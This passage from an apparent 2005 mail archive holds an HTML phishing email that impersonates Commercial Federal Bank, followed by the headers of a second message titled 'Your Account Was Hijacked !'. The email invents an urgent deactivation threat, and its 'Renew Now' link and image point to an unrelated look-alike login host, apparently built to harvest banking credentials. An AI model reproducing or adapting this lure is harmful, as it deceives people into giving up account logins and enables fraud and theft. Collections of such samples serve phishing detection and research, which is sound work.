	* -0.3 AWL AWL: From: address is in the auto white-list
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 415

<FONT face=Arial size=2><IMG src="http://login.updateyourdata.com/login/OnlineServices/comded.jpg"><BR><BR><BR>&nbsp;&nbsp;&nbsp;Dear Commercial&nbsp;Federal Bank&nbsp;Customer,<BR>&nbsp; 
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; This is your official notification from Commercial&nbsp;Federal Bank that the service(s) listed below<BR>&nbsp;&nbsp; will be deactivated and deleted if not renewed immediately. Previous notifications have<BR>&nbsp;&nbsp; been sent to the Access<i>Online</i> Contact assigned to this account. As the Primary Contact, you<BR>&nbsp;&nbsp; must renew the service(s) listed below or it will be deactivated and deleted. <A onfiltered="return ShowLinkWarning()" href="http://login.updateyourdata.com
/login/OnlineServices/index.htm" onclick="return ShowLinkWarning()"><FONT color=#003399>Renew Now</FONT></A></DIV>
<DIV><FONT color=#003399></FONT>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; SERVICE : Commercial&nbsp;Federal Bank&nbsp;<EM></EM>Access<i>Online®</i> with Bill Payment.<BR>&nbsp;&nbsp; EXPIRATION: November&nbsp;3, 2005</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; Thank you,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp;&nbsp;Commercial&nbsp;Federal Bank&nbsp;Online Banking Support, N.A.</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; *****************************************************************************<BR>&nbsp;&nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<BR>&nbsp;&nbsp; *****************************************************************************</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message. For any inquiries, contact Customer Service.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Document Reference: (92051208).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Commercial&nbsp;Federal Bank, N.A. Member FDIC.&nbsp; Equal Housing Lender.<BR>&nbsp;&nbsp; Copyright © 2005 Commercial&nbsp;Federal Bank, N.A. All rights reserved.</DIV></FONT>

From computer@webnuke.watbot.ac.th  Tue Nov  1 17:49:28 2005
Return-Path: <computer@webnuke.watbot.ac.th>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 6E33C536EC9
	for <jose@login.monkey.org>; Tue,  1 Nov 2005 17:49:28 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 3AFD16FA31B
	for <jose@monkey.org>; Tue,  1 Nov 2005 17:49:26 -0500 (EST)
Received: from webnuke.watbot.ac.th (unknown [203.151.196.68])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  1 Nov 2005 17:49:25 -0500 (EST)
Received: from webnuke.watbot.ac.th (localhost [127.0.0.1])
	by webnuke.watbot.ac.th (8.12.6/8.12.6) with ESMTP id jA1MmJ6W017367
	for <jose@monkey.org>; Wed, 2 Nov 2005 05:48:19 +0700 (ICT)
	(envelope-from computer@webnuke.watbot.ac.th)
Received: (from computer@localhost)
	by webnuke.watbot.ac.th (8.12.6/8.12.6/Submit) id jA1MmIeG017365
	for jose@monkey.org; Wed, 2 Nov 2005 05:48:18 +0700 (ICT)
Date: Wed, 2 Nov 2005 05:48:18 +0700 (ICT)
To: jose@monkey.org
Subject: Your Account Was Hijacked !
Message-ID: <1130885298.17399.sky@skyfi.com>
